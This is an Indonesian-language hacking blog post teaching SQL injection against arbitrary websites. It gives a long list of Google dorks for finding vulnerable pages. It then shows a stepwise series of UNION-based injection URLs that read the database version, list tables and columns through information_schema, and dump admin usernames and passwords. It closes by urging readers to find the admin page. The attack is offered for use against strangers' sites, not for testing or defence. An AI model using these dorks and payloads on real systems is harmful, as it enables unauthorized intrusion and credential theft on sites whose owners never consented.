Belajar Tutorial SQLi Injection

S4N - Soft4Newbie | hello guys..
kali ini saya akan memberikan sedikit ilmu saya kepada semua kawan² yang ingin tau cara bagaimana cara menggunakan SQLi Injection !!!
ok.. tidak perlu berlama-lama... langsung saja kita mulai.. !


1. Cari Situs yang Vuln cari di Google/Bingo, atau di SQLi Scanner Online. Nyengir

2. Pilih Dorknya



Code> :

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php.id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
atau anda bisa dapatkan dork disini (kalau tidak bisa di copy paste)
DORK DISINI




3. Untuk yang manual (Google/Bingo) cek situs nya dengan cara :
Contoh : http://target.com/detail.php?id=1' <<< <- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 (Cek dengan cara menambahkan tanda petik ' di belakang angka id nya) jika muncul tulisan error berarti Situsnya Vuln, kalo tidak muncul berarti situsnya tidak Vuln atau sudah di Patch

Yang menggunakan SQLi Scanner Online sudah disediakan Situs yang Vulnnya.. Nyengir

4. Lalu kita coba tambahkan order by 1-- sampai titik menuju error

Contoh:
http://target.com/detail.php?id=1 order by 1-- Tidak Error
http://target.com/detail.php?id=1 order by 2-- Tidak Error
http://target.com/detail.php?id=1 order by 3-- Tidak Error
http://target.com/detail.php?id=1 order by 4-- Tidak Error
http://target.com/detail.php?id=1 order by 5-- Error 
5. Nah, yang kita ambil bagian 4nya aja (yang error tidak usah)
hapus order by 5--, lalu ubah dengan:
http://target.com/detail.php?id=-1 union all select 1,2,3,4--
*Disamping angka id ditambahkan (-) lalu setelah angka id tambahkan union all select 1,2,3,4-- <<< dimana pada order by sebelum terjadi error

6. Pasti akan keluar angka, misalkan yang keluar angka 3 yaaa kita coba cek versionnya dengan cara hapus angka 3 ubah dengan @@version

Contoh:
http://target.com/detail.php?id=-1 union all select 1,2,@@version,4-- 
 7. Jika keluar versi 5.0.1 comunity log atau ada angka 5nya berarti lanjutkan, jika yang keluar versi 4 tinggalkan cari yang lain !!!.. Ngakak

8. Sekarang coba ganti @@version menjadi group_concat(table_name) dan setelah union all select 1,2,3,4 tambahkan from information_schema.tables where table name_schema=database()--

Contoh:
http://target.com/detail.php?id=-1 union all select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
9. Pasti akan keluar beberapa table yang mungkin berisi table User, Admin, Member, dan lain lain.
Contoh kita ambil table Admin dan kita hex textnya :
- Buka Text Hex
- Dibagian String masukkan text yang ingin di Hex
- Lalu klik Convert
- Copy hasil Hex

Jika sudah maka bagian group_concat(table_name) dan from information_schema.tables where table_schema=database()

diubah menjadi:
- table_name = column_name = group_concat(column_name)
- tables = columns = from information_schema.columns
- table_schema=database()-- = table_name=0x(tambahkan/paste kata yang di hex tadi) = table_name=0x41646d696e--

Contoh:
http://target.com/detail.php?id=-1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=0x41646d696e-- 

10. Setelah itu akan keluar beberapa column tentang username, email, password, noid, dan lain lain.
Dibagian (column_name) diubah dengan (username,0x3a,password)
Seperti ini : group_concat(username,0x3a,password)
Lalu hapus information_schema.columns where table_name=0x41646d696e-- ubah menjadi nama Column yang di Hex tadi yaitu Admin

Contoh:
http://target.com/detail.php?id=-1 union all select 1,2,group_concat(username,0x3a,password),4 from Admin--
   
11. Akan keluar Username dan Password Admin Bigsmile

12. Sekarang cari Page Adminnya Bengong

13. Saatnya berkaryaa.. Ngakak What

Nah itu Teorinya... kalo Prakteknya bisa liat di Video dari Youtube ini.. Ngakak 



Created by : everst_drg

http://www.secure.x-doc.co.cc/2011/07/tutorial-sqli-step-by-step-video.html 


untuk lebih jelasnya .. silahkan Download video tutorialnya DISINI
Share this article :
 

+ komentar + 1 komentar

Reply
pempem

btw dork itu apa ya?

Posting Komentar

 
Support by : Komunitas Anak Remaja Berbasis IT
Copyright © 2011. CARBITE BLOG .COM - All Rights Reserved
Template Created by Creating Website | Editor : p0zh1e
Proudly powered by Blogger